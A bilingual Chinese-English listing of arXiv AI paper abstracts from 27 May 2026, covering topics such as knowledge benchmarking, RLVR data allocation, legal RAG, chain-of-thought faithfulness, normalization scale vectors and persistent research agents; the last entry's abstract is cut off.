Parametric knowledge in large language models (LLMs) is a cornerstone of their success, yet remains poorly understood. Existing knowledge benchmarks typically rely on predefined questions (e.g., "What is the birth date of M.L. King?"), evaluating only knowledge that benchmark designers explicitly choose to query, a problematic availability bias. In this paper, we introduce open knowledge evaluation, a new paradigm for LLM knowledge benchmarking. Instead of asking narrow questions, it evaluates models on the knowledge they choose to surface in response to open-ended elicitation prompts (e.g., "Tell me everything you know about M.L. King"). This shifts the focus from predefined answer retrieval toward characterizing the knowledge models naturally express. We instantiate this paradigm with BeQu (Beyond Questions), a benchmark of 10,000 entities paired with reference corpora for statement verification. Using BeQu, we evaluate a broad range of language models and analyze the effects of reasoning effort, model scale, prompt format, and knowledge domain. Data and leaderboard are available on this work's GitHub repository and at the benchmark's website.

2605.26934 2026-05-27 cs.CL cs.AI 版本更新

Reasoning Depth and Environment Complexity: A Controlled Study of RLVR Data Allocation across Logical Reasoning Tasks

推理深度与环境复杂度:逻辑推理任务中RLVR数据分配的受控研究

Yihua Zhu, Qianying Liu, Fei Cheng, Jiaxin Wang, Akiko Aizawa, Sadao Kurohashi, Hidetoshi Shimodaira

发表机构 * Kyoto University(京都大学) University of Tokyo(东京大学) NII LLMC(国立情报学研究所LLMC) RIKEN(理化学研究所)

AI总结 通过将推理空间划分为深度和复杂度两个维度,并考虑四种推理形式,在合成知识图谱环境中进行受控实验,发现联合深度-复杂度覆盖优于单轴策略,不同推理家族对RLVR覆盖的反应非均匀,且均匀混合优于分阶段课程。

Comments Pre-print

详情
AI中文摘要

基于可验证奖励的强化学习(RLVR)已成为后训练推理模型的核心,但现有研究的一个关键局限在于对推理空间的狭隘视角:难度仅被视为推理深度,奖励集中在正向演绎状态追踪。相反,我们沿两个维度刻画推理空间。难度:除了推理深度,我们研究环境复杂度,即模型必须在干扰项和交互结构中识别正确路径。奖励推理形式:我们考虑现实世界推理核心的四种能力:演绎状态追踪、对隐藏事件或事实的溯因恢复、归纳规则归纳以及类比迁移。为解耦这些因素,我们构建了一个合成知识图谱环境,具有受控的预训练和后训练分布,其中每个实例在深度、复杂度和任务家族上变化。三个发现:联合深度-复杂度覆盖优于单轴策略;推理家族反应非均匀,溯因推理在RL覆盖区域外退化,任务相关性聚类为演绎-溯因对和归纳-类比对;在固定预算下,均匀混合优于分阶段课程。我们还发现,最近的现成模型表现出相同的演绎-溯因不对称性,表明这一差距并非我们受控设置的假象。

英文摘要

Reinforcement learning with verifiable rewards (RLVR) has become central to post-training reasoning models, yet a key limitation of existing studies is their narrow view of the reasoning space: difficulty is treated as reasoning depth alone, and reward is concentrated on forward deductive state tracking. We instead characterize the reasoning space along two dimensions. (1) Difficulty: beyond reasoning depth, we study environment complexity, where models must identify the correct path amid distractors and interacting structures. (2) Rewarded reasoning form: we consider four abilities core to real-world reasoning: deductive state tracking, abductive recovery of hidden events or facts, inductive rule induction, and analogical transfer. To disentangle these factors, we construct a synthetic knowledge-graph environment with controlled pre- and post-training distributions, where each instance varies along depth, complexity, and task family. Three findings emerge: joint depth-complexity coverage outperforms single-axis recipes; reasoning families respond non-uniformly, with abductive reasoning degrading outside the RL-covered region and task correlations clustering into deductive-abductive and inductive-analogy pairs; and uniform mixing outperforms staged curricula under a fixed budget. We also find that recent off-the-shelf models exhibit the same deductive-over-abductive asymmetry, suggesting that this gap is not merely an artifact of our controlled setup.

2605.26926 2026-05-27 cs.AI 版本更新

From Norms to Indicators (N2I-RAG): An Agentic Retrieval-Augmented Generation Framework for Legal Indicator Computation

从规范到指标 (N2I-RAG): 一种用于法律指标计算的智能检索增强生成框架

Youssef Al Mouatamid, Marie Bonnin, Jihad Zahir

发表机构 * LISI Laboratory(LISI实验室) Cadi Ayyad University(卡迪·阿亚德大学) Univ Brest(布雷斯特大学) IRD, Univ Brest, CNRS, Ifremer, LEMAR(IRD、布雷斯特大学、CNRS、Ifremer、LEMAR)

AI总结 提出N2I-RAG框架,通过自适应检索、基于LLM的智能体和验证机制,实现从法律文本到指标的透明、可追溯的自动计算,在法国海洋环境法语料库上优于基线方法。

详情
AI中文摘要

从规范文本计算法律指标是法律监测和政策评估中的关键任务,但由于法律语言的复杂性、规模、解释性以及可用文档质量的差异,这一任务面临重大挑战。现有的自然语言处理技术和生成模型可以辅助法律分析,但往往存在较高的幻觉风险,且缺乏可靠指标计算所需的可解释性和证据基础。本文提出N2I-RAG(从规范到指标),一种智能检索增强生成框架,旨在以透明且可追溯的方式自动化法律指标的计算。我们将自适应检索、基于LLM的智能体和验证机制集成到一个模块化流水线中,其中每个组件在过滤、检索和评估证据,以及生成与可识别法律条款相关的二元法律结果方面执行定义明确的角色。该框架通过要求对中间决策和最终指标分配进行明确解释来强调可追溯性。我们使用内部构建的包含扫描和数字两种来源的法国海洋环境法律语料库评估N2I-RAG。与多个语言模型家族的对比实验表明,所提出的方法始终优于基线系统,并且在两种不同禁令的测试中具有良好的泛化能力。结果表明,智能检索增强生成可以桥接开放文本法律语言和标准化指标计算,为透明且可扩展的法律观测站奠定基础。

英文摘要

Computing legal indicators from normative texts is a key task in legal monitoring and policy evaluation, but presents significant challenges due to the complexity, scale, and interpretive nature of legal language, as well as the variability in available document quality. Existing natural language processing techniques and generative models can assist in legal analysis, but often suffer from a high risk of hallucination and lack the interpretability and evidence grounding required for reliable indicator computation. This paper presents N2I-RAG (From Norms to Indicators), an agentic retrieval-augmented generation framework designed to automate the computation of legal indicators in a transparent and traceable way. We integrate adaptive retrieval, LLM-based agents, and validation mechanisms in a modular pipeline, where each component performs a defined role in filtering, retrieving, and assessing evidence, and in producing binary legal outcomes linked to identifiable legal provisions. The framework emphasizes traceability by requiring explicit explanations of intermediate decisions and final indicator assignments. We evaluate N2I-RAG using an in-house French marine environmental law corpus that includes both scanned and digital sources. Comparative experiments with multiple language model families demonstrate that the proposed approach consistently outperforms baseline systems and generalizes well when tested on two different bans. The results indicate that agentic retrieval-augmented generation can bridge open-text legal language and standardized indicator computation, offering a foundation for transparent and scalable legal observatories.

2605.26911 2026-05-27 cs.AI 版本更新

TADDLE: A Tool-Augmented Agent for Detecting Deficient LLM-Generated Peer Reviews

TADDLE: 一种用于检测有缺陷的LLM生成同行评审的工具增强型代理

Hanqi Duan, Xiang Li

发表机构 * East China Normal University(华东师范大学)

AI总结 针对LLM生成的同行评审难以检测缺陷的问题,提出TADDLE工具增强型代理,通过四个专用分析工具和两阶段半监督学习,在二元检测和多标签分类任务上表现优异。

详情
AI中文摘要

LLM生成的同行评审在主要会议中越来越常见,但由于它们语言流畅、结构良好,其缺陷难以检测。现有工作要么仅分类作者身份而不评判质量,要么使用为人类撰写的评审设计的特征来评分质量;没有先前系统能在单个缺陷类型级别检测LLM生成评审中的缺陷。为弥补这一空白,我们引入了TADDLE,一种用于检测有缺陷的LLM生成同行评审的工具增强型代理,以及首个针对此任务的专家标注基准。我们的基准包含对50篇ICLR 2025论文的1800条评审,由18位领域专家根据六个缺陷类别(加上一个无缺陷标签)的分类法进行多标签标注。TADDLE将检测分解为四个专用分析工具——验证、纠正、完善和转换——由一个代理协调;一个集成器通过两阶段半监督学习将其输出综合为二元和多标签分类。大量实验表明,TADDLE在二元检测和多标签分类任务上均表现强劲。我们在https://github.com/AquariusAQ/TADDLE发布基准和代码。

英文摘要

LLM-generated peer reviews are increasingly common at major venues, yet their deficiencies are hard to detect because they are uniformly fluent and well-structured. Existing work either classifies authorship without judging quality, or scores quality with features designed for human-written reviews; no prior system detects deficiencies in LLM-generated reviews at the level of individual defect types. To bridge the gap, we introduce TADDLE, a Tool-Augmented Agent for Detecting Deficient LLM-Generated Peer Reviews, together with the first expert-annotated benchmark for this task. Our benchmark comprises 1,800 reviews on 50 ICLR 2025 papers, multi-label-annotated by 18 domain experts against a taxonomy of six defect categories (plus a non-deficient label). TADDLE decomposes detection into four specialized analysis tools -- Verify, Correct, Complete, and Transform -- orchestrated by an agent; an integrator synthesizes their outputs into binary and multi-label classifications via two-stage semi-supervised learning. Extensive experiments show that TADDLE performs strongly on both binary detection and the multi-label classification task. We release the benchmark and code at https://github.com/AquariusAQ/TADDLE.

2605.26908 2026-05-27 cs.AI cs.DS cs.LG 版本更新

On the Detection of Commutative Factors in Factor Graphs: Necessary and Sufficient Conditions

关于因子图中可交换因子检测的充要条件

Malte Luttermann, Ralf Möller, Marcel Gehrke

发表机构 * Institute for Humanities-Centered Artificial Intelligence, University of Hamburg, Germany(人文导向人工智能研究所,汉堡大学,德国)

AI总结 本文重新审视了因子图中可交换因子检测的理论基础,指出现有算法依赖的定理仅为必要条件而非充分条件,并提出了修正算法以保证正确性和效率。

详情
AI中文摘要

利用概率图模型(如因子图)中对象的不可区分性是提升式(lifted)概率推理算法的关键,它使概率推理问题在领域规模上保持可处理。在因子图中利用不可区分对象的核心构件是识别可交换因子,即其输出值在分配给其部分参数的输入值的排列下保持不变的因子。本文重新审视了检测可交换因子的最先进算法的理论基础。具体而言,我们表明,在其当前形式下,最先进算法依赖于一个中心定理,该定理被错误地视为识别可交换因子的充分条件,而实际上它仅给出必要条件。因此,正如我们在本文中所展示的,最先进算法可能会产生错误结果。为了修复当前最先进算法中存在的缺陷,我们证明了上述定理的一个略微修改版本,该版本作为识别可交换因子的必要条件。此外,我们提出了最先进算法的修正版本,在保持其效率的同时确保正确性,并引入了一种具有更严格最坏情况边界的补充算法。

英文摘要

Exploiting the indistinguishability of objects in a probabilistic graphical model such as a factor graph is key to lifted probabilistic inference algorithms and allows for tractable probabilistic inference problems with respect to domain sizes. A central building block for the exploitation of indistinguishable objects in factor graphs is the identification of commutative factors, i.e., factors whose output values are invariant under permutations of input values assigned to a subset of their arguments. In this paper, we revisit the theoretical foundations underlying the state-of-the-art algorithm to detect commutative factors. Specifically, we show that in its current form, the state-of-the-art algorithm relies on a central theorem that is mistakenly regarded as a sufficient condition to identify commutative factors, while it actually only implies a necessary condition. Consequently, the state of the art might, as we show in this paper, deliver incorrect results. To fix the flaws currently present in the state of the art, we prove a slightly modified version of the aforementioned theorem, which serves as a necessary condition to identify commutative factors. Moreover, we present a corrected version of the state-of-the-art algorithm, which keeps its efficiency while ensuring correctness, and introduce a complementary algorithm with tighter worst-case bounds.
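To make the definition of a commutative factor concrete, the following sketch checks it by brute force. This is only a direct test of the definition, not the state-of-the-art or corrected algorithm the abstract refers to. The table representation (a dict keyed by assignment tuples) and the function name are assumptions made for illustration.

```python
from itertools import permutations, product

def is_commutative(factor, arity, domain, subset):
    """Brute-force check of the definition: the factor value must not change
    when the values at the argument positions in `subset` are permuted.

    factor: dict mapping each assignment tuple to a potential value.
    """
    for assignment in product(domain, repeat=arity):
        base = factor[assignment]
        picked = [assignment[i] for i in subset]
        for perm in permutations(picked):
            swapped = list(assignment)
            for pos, val in zip(subset, perm):
                swapped[pos] = val
            if factor[tuple(swapped)] != base:
                return False
    return True

# Toy factor over three Boolean arguments: it depends on arguments 0 and 1
# only through their sum, and separately on argument 2.
phi = {a: (a[0] + a[1]) * 10 + a[2] for a in product((0, 1), repeat=3)}
```

The cost grows exponentially with the arity and factorially with the subset size, which is why efficient detection algorithms matter. With floating-point potentials, the exact comparison would need to be replaced by a tolerance check.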

2605.26898 2026-05-27 cs.SE cs.AI 版本更新

Strategies for Guiding LLMs to Use Software Design Patterns: A Case of Singleton

引导LLM使用软件设计模式的策略:以单例模式为例

Viktor Kjellberg, Farnaz Fotrousi, Miroslaw Staron

发表机构 * University of Gothenburg and Chalmers University of Technology(哥德堡大学和查尔姆斯理工大学)

AI总结 通过实验比较四种提示策略(指令、二元自动反馈、详细自动反馈、少样本详细反馈),评估13个LLM在164个Java编码挑战中生成遵循单例模式的代码的能力,发现迭代二元反馈在保持或提升功能性的同时最佳地实现了单例模式对齐。

Comments Accepted at PROMISE 2026

详情
AI中文摘要

大型语言模型(LLM)可以从自然语言提示生成功能性源代码,但往往无法一致地遵循更高级别的架构结构或设计模式。由于LLM在软件工程中的应用日益增多,它们将既定设计原则应用于生成代码的能力对于软件产品的长期成功至关重要。因此,本文的目标是确定引导LLM将设计模式融入生成源代码的策略。我们设计了一个计算实验,评估13个LLM生成遵循单例设计模式的代码的能力,使用了四种提示策略:指令、二元自动反馈、详细自动反馈以及带少样本提示的详细反馈,在HumanEval-X的164个Java编码挑战中进行。我们的结果表明,引导LLM包含设计模式的最佳策略在很大程度上取决于模型类型。尽管如此,总体而言,迭代二元反馈在保持或改善代码功能性的同时,提供了与单例模式的最佳对齐。通过指令引导,Llama 3.3在100%的情况下生成了单例类,并改善了代码功能性,使通过的测试数量增加了34.1个百分点。通过指令和二元反馈引导,它取得了类似的结果。Qwen 3(8B)使用二元反馈将单例模式对齐度提高到99.2%,功能性提高到58.6%。我们的结果表明,即使是简单的策略也可以用于引导LLM使用设计模式。

英文摘要

Large Language Models (LLMs) can generate functional source code from natural-language prompts, but often fail to consistently follow higher-level architectural structures or design patterns. Since LLMs are increasingly used in software engineering, their ability to apply established design principles to generated code is crucial to the long-term success of software products. Therefore, the goal of this paper is to identify strategies for guiding LLMs to incorporate design patterns into the generated source code. We designed a computational experiment to evaluate the ability of 13 LLMs to generate code that follows the Singleton design pattern, using four prompting strategies: instructions, binary automated feedback, extensive automated feedback, and extensive feedback with few-shot prompts, in 164 Java coding challenges from HumanEval-X. Our results show that the optimal strategy to guide LLMs to include design patterns depends heavily on the type of model. Still, overall, iterative binary feedback provides the best alignment with Singleton while preserving or improving the code's functionality. When guided with instructions, Llama 3.3 generated Singleton classes in 100% of cases and improved code functionality, increasing the number of tests passed by 34.1 percentage points. It achieved a similar result with guidance through instructions and binary feedback. Qwen 3 (8B) increased the alignment with Singleton to 99.2% and the functionality to 58.6% using binary feedback. Our results suggest that even simple strategies can be used to guide LLMs to use design patterns.

2605.26895 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Negligible in Size, Significant in Effect: On Scale Vectors in Large Language Models

微不足道的大小,显著的效果:大型语言模型中的尺度向量

Mingze Wang, Shuchen Zhu, Yuxin Fang, Binghui Li, Kai Shen, Shu Zhong

发表机构 * Peking University(北京大学)

AI总结 本文系统研究了大型语言模型中的尺度向量,发现其虽参数占比极小但对预训练至关重要,通过自放大预条件效应优化优化过程,并提出了三种轻量级改进策略,在多种模型规模上一致提升性能。

Comments 36 pages

详情
AI中文摘要

现代大型语言模型(LLM)中的归一化层由确定性归一化操作和可学习的尺度向量组成。尽管归一化操作已被广泛研究,但尺度向量尽管被普遍使用,其作用仍未被充分理解。在这项工作中,我们从表达能力、优化和架构结构的角度对LLM中的尺度向量进行了系统研究。首先,我们通过实验表明,虽然尺度向量仅占模型参数的极小部分,但移除它们会显著降低LLM的预训练效果。我们的理论进一步表明,在Pre-Norm架构中,尺度向量并不增加表达能力;相反,它们通过对后续线性映射产生自放大预条件效应来改善优化。其次,我们研究了权重衰减对尺度向量的作用。通过区分Input-Norm和Output-Norm层,我们从理论上证明,由于它们在优化和表达能力中的不同作用,权重衰减对前者有益但对后者有害。第三,受此理解的启发,我们提出了三种轻量级且互补的尺度向量改进方法:分支特异性异质性、线性映射周围的改进放置以及幅度-方向重参数化。理论和实验均表明,每种改进都能带来一致的收益。最后,我们将这些改进整合为一个统一的尺度向量策略,并通过在0.12B到2B参数的密集和混合专家模型上进行大规模LLM预训练实验,使用多种优化器和学习率调度,在工业级token预算下进行评估。该统一策略始终比精心调整的基线获得更低的终端损失,并展现出更有利的扩展行为,同时增加可忽略的参数和计算开销。

英文摘要

Normalization layers in modern large language models (LLMs) consist of a deterministic normalization operation and a learnable scale vector. While the normalization operation has been extensively studied, the scale vector remains poorly understood despite its ubiquitous use. In this work, we present a systematic study of scale vectors in LLMs from the perspectives of expressivity, optimization, and architectural structure. First, we show empirically that although scale vectors constitute only a negligible fraction of model parameters, removing them substantially degrades LLM pre-training. Our theory further shows that, in Pre-Norm architectures, scale vectors do not increase expressivity; instead, they improve optimization through a self-amplifying preconditioning effect on subsequent linear mappings. Second, we investigate the role of weight decay for scale vectors. By distinguishing Input-Norm and Output-Norm layers, we theoretically show that weight decay is beneficial for the former but harmful for the latter, due to their distinct roles in optimization and expressivity. Third, motivated by this understanding, we propose three lightweight and complementary improvements to scale vectors: branch-specific heterogeneity, improved placement around linear mappings, and magnitude-direction reparameterization. Both theory and experiments show that each improvement yields consistent gains. Finally, we combine these improvements into a unified scale-vector strategy and evaluate it through extensive LLM pre-training experiments on dense and mixture-of-experts models ranging from 0.12B to 2B parameters, across multiple optimizers and learning rate schedules, under industrial-scale token budgets. The unified strategy consistently achieves lower terminal loss than well-tuned baselines and exhibits more favorable scaling behavior, while adding negligible parameter and computational overhead.
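One standard way to see why a scale vector placed directly before a linear map adds no expressivity is that it can be folded into that map's weights: W(g ⊙ x̂) = (W diag(g)) x̂. The sketch below checks this numerically in plain Python. It assumes an RMSNorm-style normalization and a bias-free linear layer; the function names are illustrative, and this is not claimed to be the paper's own argument.

```python
import math

def rms_norm(x, scale, eps=1e-6):
    """RMS normalization followed by an elementwise learnable scale vector."""
    rms = math.sqrt(sum(v * v for v in x) / len(x) + eps)
    return [s * v / rms for s, v in zip(scale, x)]

def linear(weight, x):
    """Plain matrix-vector product; `weight` is a list of rows."""
    return [sum(w * v for w, v in zip(row, x)) for row in weight]

def fold_scale(weight, scale):
    """Absorb the scale vector into the columns of the following linear map."""
    return [[w * s for w, s in zip(row, scale)] for row in weight]

x = [1.0, -2.0, 3.0]
g = [0.5, 2.0, -1.0]                       # scale vector
W = [[1.0, 2.0, 3.0], [0.0, -1.0, 4.0]]    # subsequent linear map

with_scale = linear(W, rms_norm(x, g))
folded = linear(fold_scale(W, g), rms_norm(x, [1.0] * len(x)))
```

The two outputs agree up to rounding, so the represented function is the same either way. The two parameterizations can still follow different optimization trajectories under gradient descent, which is consistent with the abstract attributing the benefit to optimization instead of expressivity.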

2605.26893 2026-05-27 cs.CL cs.AI 版本更新

GeoFaith: A Spatio-Temporal Dual View of Faithful Chain-of-Thought

GeoFaith: 时空双视角下的忠实思维链

Weijiang Lv, Wentong Zhao, Jiayu Wang, Yuhao Wu, Jiaheng Wei, Xiaobo Xia

发表机构 * Xidian University(西安电子科技大学) Xi’an Jiaotong University(西安交通大学) Mohamed bin Zayed University of Artificial Intelligence(穆罕默德·本·扎耶德人工智能大学) The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)) University of Science and Technology of China(中国科学技术大学)

AI总结 针对思维链推理中的事后合理化问题,提出基于潜在几何结构和熵动力学的时空框架GeoFaith,通过可扩展的引导流水线构建忠实性检测器并联合优化结果正确性、过程忠实性和轨迹一致性。

详情
AI中文摘要

思维链推理推动了大型语言模型的发展,但基于结果的监督导致了普遍的事后合理化,产生了看似合理但不忠实的推理链。大多数先前的忠实性评估方法要么不可扩展、昂贵,要么不可靠。我们提出GeoFaith,一个利用潜在几何结构和熵动力学来诊断和强制忠实推理的时空框架。我们开发了一个可扩展的引导流水线,将四个领域的步骤级标注从1k扩展到20k样本,训练了一个在标准基准上优于GPT-5的8B忠实性检测器,并设计了一个忠实性感知的强化学习框架,联合优化结果正确性、过程忠实性和轨迹一致性。实验表明,所提出的方法在忠实性检测和下游推理上均取得了优越性能,生成了更短、更可解释的链,且不牺牲准确性。我们的代码将公开提供。

英文摘要

Chain-of-Thought (CoT) reasoning has advanced large language models (LLMs), but outcome-based supervision leads to pervasive post-hoc rationalization, producing plausible yet unfaithful reasoning chains. Most prior faithfulness assessment methods are either unscalable, expensive, or unreliable. We propose GeoFaith, a spatio-temporal framework that leverages latent geometric structure and entropy dynamics to diagnose and enforce faithful reasoning. We develop a scalable bootstrapping pipeline expanding step-level annotations from 1k to 20k samples across four domains, train an 8B faithfulness detector outperforming GPT-5 on standard benchmarks, and design a faithfulness-aware reinforcement learning framework jointly optimizing outcome correctness, process faithfulness, and trajectory consistency. Experiments show the proposed method achieves superior performance on both faithfulness detection and downstream reasoning, producing shorter, more interpretable chains without sacrificing accuracy. Our code will be made available publicly.

2605.26878 2026-05-27 cs.AI 版本更新

Multi-Stakeholder LLM Alignment: Decomposing Estimation from Aggregation

多方利益相关者LLM对齐:从聚合中分解估计

Lulu Zheng, Wenjin Yang, Xiangwen Zhang, Rong Yin, Yulan Hu, Zheng Pan, Xin Li

发表机构 * AMAP, Alibaba Group(阿里集团AMAP) Beihang University(北京航空航天大学)

AI总结 针对多方利益相关者任务中用户偏好冲突的问题,提出DecompR方法,通过反事实校准权重固定查询结构,独立估计角色效用,消除候选依赖的权重漂移并降低估计噪声。

详情
AI中文摘要

多方利益相关者任务需要单个输出满足具有冲突偏好的用户。整体LLM评判器混淆了效用估计和效用聚合,产生不稳定的隐式权重。我们通过实验和理论证明,当利益相关者满意度分散时,这种聚合特有的“权重噪声”可能导致较大的分数偏移;在我们的实验中,这些权重引起的偏移也随利益相关者数量增加而增加。我们提出DecompR:反事实校准的权重在候选评分前根据查询结构固定,而每个角色的效用独立估计,消除了候选依赖的权重漂移并减少了估计噪声。

英文摘要

Multi-stakeholder tasks require one output to satisfy users with conflicting preferences. Holistic LLM judges conflate utility estimation and utility aggregation, yielding unstable implicit weights. We show empirically and theoretically that this aggregation-specific "weighting noise" can create large score shifts when stakeholder satisfaction is dispersed; in our experiments, these weight-induced shifts also increase with stakeholder count. We propose DecompR: counterfactual-calibrated weights are fixed from query structure before candidate scoring, while per-role utilities are estimated independently, removing candidate-dependent weight drift and reducing estimation noise.
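The separation of estimation from aggregation can be sketched as follows: weights are fixed once per query, per-role utilities are supplied independently for each candidate, and every candidate is scored with the same weights. The role names, the weight values, and the normalized weighted sum are illustrative assumptions; the abstract does not state how DecompR calibrates weights or combines utilities.

```python
def aggregate(weights, utilities):
    """Normalized weighted sum of per-role utilities.

    `weights` is fixed per query before any candidate is scored, so it
    cannot drift from one candidate to the next.
    """
    total = sum(weights.values())
    return sum(weights[role] * utilities[role] for role in weights) / total

def rank_candidates(weights, per_candidate_utilities):
    """Score every candidate with the same weights, then sort best-first."""
    scored = {
        name: aggregate(weights, utilities)
        for name, utilities in per_candidate_utilities.items()
    }
    return sorted(scored, key=scored.get, reverse=True)

# Hypothetical query with two stakeholder roles and two candidate outputs.
weights = {"buyer": 2.0, "seller": 1.0}
candidates = {
    "A": {"buyer": 0.9, "seller": 0.2},
    "B": {"buyer": 0.4, "seller": 0.9},
}
ranking = rank_candidates(weights, candidates)
```

A holistic judge, by contrast, would emit a single score per candidate, leaving the effective weights implicit and free to vary between candidates.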

2605.26870 2026-05-27 cs.MA cs.AI cs.HC 版本更新

Persistent AI Agents in Academic Research: A Single-Investigator Implementation Case Study

学术研究中的持久性AI智能体:单研究者实施案例研究

Anas H. Alzahrani

发表机构 * Department of Preventive Medicine and Public Health, Faculty of Medicine, King Abdulaziz University(预防医学与公共卫生系,医学院,国王阿卜杜勒阿齐兹大学)

AI总结 通过单研究者案例研究,分析了持久性AI智能体在真实学术环境中的架构、使用、产出和治理,发现缓存主导的工作流可能将经济单位从每token成本转向每完成工件成本。

Comments 19 pages, 2 figures, 3 main tables; supplementary appendix with 6 tables, 2 figures, and a reproducibility methods section. Describes 17 configured agents in a persistent research environment and introduces the PARE-M (Persistent Agentic Research Environment Measurement) framework

详情
AI中文摘要

背景:大型语言模型通常作为模型、基准或简短对话片段进行评估。当智能体持久嵌入真实学术研究环境,具有持久记忆、本地文件、外部工具、计划例程、委派角色和明确安全协议时,会发生什么知之甚少。方法:从2026年1月31日至5月25日进行了一项结构化自我观察的实施案例研究。分析单元是持久的人-智能体环境:研究者、智能体运行时、记忆层、工具、仓库、计划任务、专门智能体角色和治理规则。结果使用PARE-M(持久智能体研究环境测量)组织,这是一个涵盖架构、利用、工件生产、资源使用、可重复性和治理的测量框架。结果:可恢复的主智能体遥测包含96个活跃日中的75,671条去重记录,其中8,059条用户角色消息和23,710条助手角色消息。工作空间包括502个记忆相关文件、17个配置的智能体目录和57个技能文件。活跃系统时间为579.7小时(30分钟上限间隙估计)。记忆衍生记录识别出482个输出代理事件和889个失败、验证、纠正或协议代理事件。一个严格的2026年5月轨迹子集捕获了627个模型完成事件和73.95百万记录token,其中82.9%为缓存读取。结论:工作流以缓存为主导,表明持久智能体环境可能将经济单位从每token成本转向每完成工件成本。未来评估应使用工件级分母、可重复解析规则、纠正分类法和治理事件的独立编码。

英文摘要

Background: Large language models are typically evaluated as models, benchmarks, or short conversational episodes. Less is known about what happens when an agent is embedded persistently in a real academic research environment with durable memory, local files, external tools, scheduled routines, delegated roles, and explicit safety protocols. Methods: A structured self-observed implementation case study was conducted from January 31 to May 25, 2026. The unit of analysis was the persistent human-agent environment: researcher, agent runtime, memory layer, tools, repositories, scheduled jobs, specialized agent roles, and governance rules. Outcomes were organized using PARE-M (Persistent Agentic Research Environment Measurement), a measurement framework covering architecture, utilization, artifact production, resource use, reproducibility, and governance. Results: Recoverable main-agent telemetry contained 75,671 de-duplicated records across 96 active days, with 8,059 user-role and 23,710 assistant-role messages. The workspace included 502 memory-related files, 17 configured agent directories, and 57 skill files. Active system time was 579.7 hours (30-minute capped-gap estimate). Memory-derived records identified 482 output-proxy events and 889 failure, verification, correction, or protocol-proxy events. A strict May 2026 trajectory subset captured 627 model-completed events and 73.95 million recorded tokens, of which 82.9% were cache reads. Conclusions: The workflow was cache-dominant, suggesting that persistent agentic environments may shift the economic unit from cost per token to cost per completed artifact. Future evaluations should use artifact-level denominators, reproducible parsing rules, correction taxonomies, and independent coding of governance events.

2605.26856 2026-05-27 q-bio.NC cs.AI cs.RO 版本更新

The Sensation Modulating Network: Haltability as the architectural ground for object-directed phenomenology

感觉调节网络:可停性作为对象导向现象学的架构基础

G. Nagarjuna, Durgaprasad Karnam

发表机构 * Indian Institute of Science Education and Research (IISER) Pune(印度科学教育与研究学院(IISER)浦那) Centre for Educational Technology (CET), Indian Institute of Technology Bombay(教育技术中心(CET),印度理工学院孟买)

AI总结 本文提出感觉调节网络(SMN)作为具身认知的架构,通过对手动力学和可停性机制,将对象导向现象学(胡塞尔意义)的意向性建立在身体组织的结构特征上,从而调和认知主义与4E认知的争论。

Comments 64 pages, main body 38 pages + References 6, Appendices 20 pages, Tables 3, and Figures 21

详情
AI中文摘要

认知科学仍然分裂为认知主义——它解释了递归和语言,但无法将形式符号扎根于意义——和4E方法——它将认知扎根于身体,但很少详细说明身体的架构以支持生成性。我们认为这一僵局源于对具身代理架构的不完整描述,并提出一个架构:感觉调节网络(SMN),即认知代理被构想为整个身体,在每个解剖尺度上由对手动力学组织,由感觉调节器构建,这些调节器通过一个基底感知和行动,配对成协调动作区,由全身广播网络路由。三个承诺赋予了SMN其效力。可停性——将对抗性可供性招募到共激活平衡中——提供了对象导向现象学(在胡塞尔意义上)所需的架构位置:对手性使得共激活成为可能,共激活使得停止成为可能,停止使得注意成为可能,注意使得意向指向成为可能,而无需在顶层添加任何模块。可自我调节动作模式(SMAP)的双信号特性使得自我/世界区分成为布线的结构特征,而非代理应用的范畴。四级动作模式层级——基础、可停、可协商、交易——提供了从自主规律性到公共惯例化的单一轨迹,将基于语法的生成性条件定位为架构转变。SMN调和了认知主义与4E的争论:递归存在于可协商动作模式的可修改动力学中,具身性存在于支持它们的对手基底中。附录中给出了一个初步的形式化方法和八个预测寄存器(七个可测试,一个假设性),以及参考模拟。

英文摘要

Cognitive science remains split between cognitivism - which accounts for recursion and language but cannot ground formal symbols in meaning - and 4E approaches - which ground cognition in the body but rarely specify the body's architecture in enough detail to support generativity. We argue the impasse stems from an incomplete account of the embodied agent's architecture, and propose one: the Sensation Modulating Network (SMN), the cognitive agent conceived as the whole body, organized at every anatomical scale by opponent dynamics, built from Sensation Modulators that sense and act through one substrate, paired into Coordinated Action Zones routed by a body-wide broadcast network. Three commitments give the SMN its purchase. Haltability - the recruitment of antagonistic affordance into co-activated equilibrium - provides the architectural locus that object-directed phenomenology, in Husserl's sense, requires: opponency enables co-activation, co-activation enables halt, halt enables attention, attention enables intentional directedness, with no module added on top. The dual-signal property of self-modulatable action patterns (SMAPs) makes the self/world distinction a structural feature of the wiring rather than a category the agent applies. And a four-level action-pattern hierarchy - Basal, Haltable, Negotiable, Transactional - gives a single trajectory from autonomic regularity to public conventionalization, locating the conditions for grammar-grounded generativity as architectural transitions. The SMN reconciles the cognitivism-4E debate: recursion lives in the modifiable dynamics of Negotiable Action Patterns, embodiment in the opponent substrate that supports them. A tentative formalism and eight predicted registers (seven testable, one hypothetical), with reference simulations, are given in an appendix.

2605.26835 2026-05-27 cs.AI 版本更新

Helicase: Uncertainty-Guided Supply Chain Knowledge Graph Construction with Autonomous Multi-Agent LLMs

Helicase: 不确定性引导的供应链知识图谱构建与自主多智能体大语言模型

Yunbo Long, Haolang Zhao, Ge Zheng, Alexandra Brintrup

发表机构 * Department of Engineering, University of Cambridge(剑桥大学工程系) The Alan Turing Institute(艾伦·图灵研究所)

AI总结 提出Helicase,一种基于多智能体大语言模型的自主系统,通过不确定性引导的迭代验证和知识图谱构建,解决供应链中需要多跳推理的结构化推断问题,并引入SCQA基准评估。

详情
AI中文摘要

